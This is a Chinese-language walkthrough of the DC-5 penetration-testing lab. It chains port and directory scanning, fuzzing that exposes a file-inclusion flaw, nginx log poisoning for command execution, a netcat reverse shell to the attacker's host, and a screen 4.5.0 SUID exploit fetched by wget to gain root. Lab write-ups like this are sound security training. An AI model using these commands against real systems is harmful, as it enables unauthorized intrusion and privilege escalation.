前言
DC-5 是一个具有文件包含漏洞的靶场,那么我们如何去发现文件包含漏洞以及利用它反弹shell,再提权呢?
一、nmap,dirb扫描
做渗透测试的第一步一定是信息收集。常用工作有nmap,dirb等。
已知靶场地址为192.168.0.102
可正常访问
使用nmap扫描开放的端口
nmap -sT -p- --min-rate 2000 192.168.0.102
再用dirb扫描隐藏文件
dirb http://192.168.0.102 /usr/share/wordlists/dirb/big.txt -X .php,.txt
扫描到以下php文件
其中只有footer.php和thankyou.php在页面中没有显示
并且在contact页面submit提交后可看到thankyou.php
所以只有footer.php文件没有显示
查看一下
注意看该页面内容在另一个地方也出现过
footer.php独立显示的内容显示在了thankyou.php页面上,可以猜想是否是thankyou.php文件包含了footer.php文件,但是并不知道是否真的有文件包含,以及可利用否。
二、模糊化测试
所以继续做模糊化测试
wfuzz -w /usr/share/wfuzz/wordlist/general/test.txt -w /usr/share/wfuzz/wordlist/Injections/Traversal.txt http://192.168.0.102/thankyou.php?FUZZ=FUZ2Z
查看结果
尝试file参数
文件包含成功,文件包含漏洞也就找到了
三、文件包含漏洞利用
可以利用在liunx日志中写入php代码,制造命令执行漏洞
liunx登录日志默认路径为
/var/log/nginx/access.log
包含日志文件bp抓包写入php代码
再通过在url中提交cmd参数值,进行命令执行
http://192.168.0.102/thankyou.php?file=/var/log/nginx/access.log&cmd=ls
查看页面源代码
命令执行成功
四、shell反弹
利用命令执行反弹shell
因为都在内网当中所以不需要借助公网端口映射,监听端口
kali监听8001端口
nc -lvp 8001
url:http://192.168.0.102/thankyou.php?file=/var/log/nginx/access.log&cmd=nc 192.168.0.107 8001 -e /bin/bash
kali上shell反弹成功
页面优化
python -c 'import pty;pty.spawn("/bin/bash")'
五、提权
尝试sudo提权
sudo -l
不可行
查看etc/passwd 和计划任务 /etc/crontab,都没有发现
查看suid位提权方式
find / -user root -perm -4000 -print 2>/dev/null
和自己本机做对比
发现/bin/screen-4.5.0有点奇怪
查看有无权限提升模块
searchsploit screen 4.5.0
下载权限提升模块
searchsploit -m 41152
searchsploit -m 41154
然后开启一个web服务,上传可利用的模块
在靶机端,进入/tmp目录,利用wget 下载模块
python3 -m http.server 80
wget http://192.168.0.107/41154.sh
给模块可执行权限
chmod +x 41154.sh
再运行 41154.sh
但是报错,可能是因为靶机gcc环境不行,不能运行模块,我们可以在自己kali主机运行后再将其传到靶机上
创建一个新的目录baby,将41154.sh移入并运行
查看/tmp中生成的文件
将这两个文件上传到靶机
都加上可执行权限
再运行
./rootshell
./41154.sh
可获得root权限
总结
以上是DC-5 靶场的整个渗透过程,也是很经典的渗透流程,希望对大家有帮助。